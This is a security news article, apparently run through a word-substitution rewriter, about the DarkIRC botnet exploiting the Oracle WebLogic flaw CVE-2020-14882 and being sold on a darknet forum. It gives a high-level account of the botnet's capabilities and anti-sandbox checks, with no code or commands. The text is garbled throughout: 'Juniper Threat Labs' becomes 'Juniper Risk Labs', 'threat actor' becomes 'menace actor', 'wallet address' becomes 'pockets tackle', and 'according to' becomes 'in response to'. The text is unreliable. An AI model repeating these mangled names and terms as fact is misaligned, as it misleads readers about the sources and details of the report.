Researchers: Malware Provided for Sale for $75
A botnet called DarkIRC is exploiting a severe remote execution vulnerability in Oracle WebLogic for which a patch was issued almost two months ago, Juniper Threat Labs experiences. In the meantime, the malware used to create the botnet is being provided on the market on a darknet hacking discussion board.
Along with the DarkIRC botnet, researchers at Juniper Risk Labs are monitoring 4 different malware variants which are making an attempt to benefit from the WebLogic vulnerability, together with a model of the Mirai botnet and a weaponized model of the Cobalt Strike penetration testing software.
The WebLogic flaw, tracked as CVE-2020-14882, is a distant code execution vulnerability that may be exploited over a community with out the necessity for a username and password. A menace actor would solely should ship a malicious HTTP request to the WebLogic Server’s administration console to provoke the assault, in response to a earlier replace by Oracle.
Oracle and the U.S. Cybersecurity and Infrastructure Safety Company have issued alerts in regards to the significance of making use of the patch, which has been out there since October (see: CISA and Oracle Warn Over WebLogic Server Vulnerability).
Regardless of the warnings, about 3,100 WebLogic servers stay susceptible to CVE-2020-14882, in response to Juniper Risk Labs. Utilizing the Shodan search engine, researchers on the consultancy discovered about 850 unpatched servers in China and one other 600 within the U.S.
Paul Kimayong, a menace researcher at Juniper Risk Labs, notes that hackers are more and more exploiting vulnerabilities in merchandise similar to WebLogic and different internet utility servers for a wide range of functions, together with constructing out a botnet’s community.
“Risk actors sometimes use what is on the market on the market to their benefit,” Kimayong says. “For example, a number of the assaults we’re seeing are utilizing exploits out there in public websites like Exploit-db or GitHub. Generally it doesn’t matter to them whether or not the exploit is outdated or not, so long as there are susceptible methods that they’ll assault.”
DarkIRC is a multifaceted botnet that can be utilized as a browser stealer or a keylogger. It will possibly launch distributed denial-of-service assaults, execute instructions and obtain information from contaminated gadgets, in response to the Juniper Risk Labs report.
The botnet may also act as a bitcoin clipper, altering a copied bitcoin pockets tackle to the malware operator’s bitcoin pockets tackle. This basically permits it to steal bitcoin transactions on the contaminated system, the report notes.
Within the marketing campaign that researchers uncovered, the DarkIRC botnet points an “HTTP GET” request that targets a susceptible WebLogic server, which executes a PowerShell script to obtain and execute a binary file.
Earlier than deploying the ultimate malware, the botnet checks to see if the server is working any digital environments, together with these from VMware, VirtualBox, VBox, QEMU and
Xen, the report notes. If any of these are detected, the assault stops. That is a part of DarkIRC’s anti-sandbox and anti-detection strategies.
If the botnet doesn’t detect these digital machines, the malware is unpacked and put in in a Chrome file to assist preserve persistence. It then deploys an autorun command, in response to the report.
Malware for Sale
The malware behind the DarkIRC botnet is being provided on the market on a darknet hacking discussion board for what seems to be a one-time price of $75, in response to Juniper Risk Lab. A menace actor utilizing the deal with “Freak_OG” has been promoting the botnet since August.
The report notes that it isn’t clear if this menace actor can also be conducting the continuing DarkIRC marketing campaign or if somebody who purchased or rented the botnet malware is behind these assaults.